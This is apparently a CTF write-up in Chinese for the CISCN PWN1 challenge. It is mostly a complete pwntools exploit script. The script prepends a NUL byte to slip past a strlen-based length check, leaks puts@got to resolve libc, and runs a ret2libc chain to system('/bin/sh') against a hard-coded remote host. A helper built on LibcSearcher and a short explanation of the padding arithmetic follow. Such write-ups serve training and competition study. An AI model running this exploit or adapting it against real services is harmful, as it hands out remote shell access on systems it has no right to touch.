在输入开头放一个 \x00：strlen 在该字节处停止计数，基于 strlen 的长度检查被绕过，而后面的字节仍然被读入缓冲区，于是可以继续输入 payload。
其余步骤就是常规的 ret2libc：第一次溢出用 puts(puts@got) 泄露 libc 地址并返回 main，第二次溢出调用 system("/bin/sh")。

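from pwn import *
from PwnModules import *

# Debug logging shows every byte exchanged, which is what you want while
# tuning offsets; lower it once the chain is stable.
context(arch='amd64', os='linux', log_level='debug')

# Run as `python3 exp.py LOCAL` to test against the local binary;
# the default is the remote target.
if args.LOCAL:
    io = process('./CISCN_PWN1')
else:
    io = remote('43.143.7.127', 28567)
elf = ELF('./CISCN_PWN1')

# Distance from the start of the buffer to the saved return address, as
# laid out by the payloads below: 0x58 bytes of padding, then the chain.
# The leading NUL terminates strlen() early so the length check passes;
# it already occupies one byte of that distance, hence the -1 on the filler.
OFFSET_TO_RET = 0x50 + 0x08
Padding = b'\x00' + b'A' * (OFFSET_TO_RET - 0x01)

puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.sym['main']
# Hard-coded gadgets (binary is not PIE). `rdi` is presumably `pop rdi; ret`
# and `ret` a lone `ret` -- TODO confirm with ROPgadget before reusing.
rdi = 0x400C83
ret = 0x4006B9


def send_chain(chain):
    """Walk the menu once (option 1) and deliver `chain` as the overflowing input."""
    io.recvuntil(b'choice!\n')
    io.sendline(b'1')
    io.recvuntil(b'encrypted\n')
    io.sendline(chain)


# Stage 1: puts(puts@got) prints the runtime address of puts, then return to
# main so we get a second overflow.
Payload = Padding + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
send_chain(Payload)

io.recvuntil(b'Ciphertext\n')
io.recvuntil(b'\n')
# A userland libc pointer is 6 significant bytes ending in 0x7f. If the
# leak happens to contain 0x0a, the recvuntil(b'\n') above eats part of
# it and the check below fires -- just rerun the exploit in that case.
raw_leak = io.recvuntil(b'\x7f')
if len(raw_leak) != 6:
    raise ValueError(f'unexpected puts leak: {raw_leak!r}')
addr = u64(raw_leak[:6].ljust(8, b'\x00'))

# libc_remastered returns (libc_base, system, "/bin/sh") resolved via LibcSearcher.
libc_base, system_addr, sh_addr = libc_remastered('puts', addr)
log.success(f'puts @ {addr:#x}, libc base @ {libc_base:#x}')

# Stage 2: system("/bin/sh"). The extra `ret` is presumably there to keep
# rsp 16-byte aligned at the call into system() (the usual movaps issue).
Payload_2 = Padding + p64(ret) + p64(rdi) + p64(sh_addr) + p64(system_addr)
send_chain(Payload_2)
io.interactive()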
libc_remastered 的内容：就是 LibcSearcher 的标准用法，可以直接替换成下面的代码（输入泄露的符号名和地址，返回 libc 基址、system 和 "/bin/sh" 的地址）。
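def libc_remastered(func, addr_i):
    """Resolve libc addresses from one leaked symbol using LibcSearcher.

    Args:
        func: name of the leaked libc symbol (e.g. 'puts').
        addr_i: runtime address leaked for that symbol.

    Returns:
        A tuple (libc_base, system_addr, binsh_addr).

    Raises:
        ValueError: if the computed libc base is not page aligned, which
            means the leak or the matched libc is wrong.
    """
    # NOTE(review): LibcSearcher may match several libc builds and prompt
    # interactively; when the remote libc is known, pin it instead.
    libc_i = LibcSearcher(func, addr_i)
    libc_base_i = addr_i - libc_i.dump(func)
    # libc is mmap'd on a page boundary; anything else is a bad match.
    if libc_base_i & 0xfff:
        raise ValueError(f'libc base {libc_base_i:#x} is not page aligned')
    sys_i = libc_base_i + libc_i.dump('system')
    sh_i = libc_base_i + libc_i.dump('str_bin_sh')
    return libc_base_i, sys_i, sh_i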

0x50 + 0x08 - 0x01
这里为什么要 -1？因为 Padding 的总长度应为 0x58（0x50 + 0x08，正好覆盖到返回地址），而开头用于绕过 strlen 的 \x00 本身已经占了 1 字节，所以 'A' 只需填充 0x57 个。